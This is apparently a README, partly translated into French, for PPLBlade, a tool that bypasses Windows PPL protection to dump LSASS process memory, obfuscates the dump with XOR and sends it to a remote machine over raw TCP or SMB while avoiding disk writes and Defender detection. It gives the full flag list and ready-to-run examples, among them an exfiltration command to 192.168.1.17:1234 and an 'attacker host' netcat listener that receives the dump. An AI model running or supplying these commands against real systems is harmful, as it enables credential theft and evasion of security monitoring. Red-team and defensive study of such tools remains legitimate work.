
Contourne la protection PPL pour vider la mémoire du processus LSASS, obscurcit les fichiers de vidage avec XOR, et les exfiltre à distance via RAW ou SMB sans écrire sur le disque.
Outil de vidage de processus protégé qui supporte l'obfuscation du vidage mémoire et son transfert vers des postes de travail distants sans le déposer sur le disque.
Fonctionnalités clés:
Un aperçu des techniques utilisées dans cet outil est disponible ici : https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6
Notez que PROCEXP15.SYS est listé dans les fichiers source à des fins de compilation. Il n'a pas besoin d'être transféré sur la machine cible avec le PPLBlade.exe.
Il est déjà intégré dans le PPLBlade.exe. L'exploit est un seul exécutable.
Modes:
Modes de Handle:
Usage of PPLBlade.exe:
-driver string
Path where the driver file will be dropped (default: current directory)
-dumpmode string
Dump mode [local|network] (default "local")
-dumpname string
Name of the dump file (default "PPLBlade.dmp")
-handle string
Method to obtain target process handle [direct|procexp] (default "direct")
-help
Prints this help message
-ip string
IP of the remote server
-key string
XOR Key for obfuscation (default "PPLBlade")
-mode string
Kill or Dump process [dump|decrypt|cleanup|dothatlsassthing] (default "dump")
-name string
Process name of target process
-network string
Method for network transfer[raw|smb] (default "raw")
-obfuscate
Obfuscate dump file
-pass string
SMB password
-pid int
PID of target process (prioritized over process name)
-port int
PORT on the remote server
-quiet
Quiet mode
-service string
Name of the service (default "PPLBlade")
-share string
share name
-user string
SMB username
Examples:
PPLBlade.exe --mode dothatlsassthing
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
PPLBlade.exe --mode cleanup
Exemples:
POC basique qui utilise PROCEXP152.sys pour vider lsass :
PPLBlade.exe --mode dothatlsassthing
(Notez qu'il ne XOR pas le fichier de vidage, fournissez un indicateur obfuscate supplémentaire pour activer la fonctionnalité XOR)
Téléchargez le vidage LSASS obfusqué vers un emplacement distant :
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
Hôte attaquant :
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp
Désobfusquer le vidage mémoire :
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade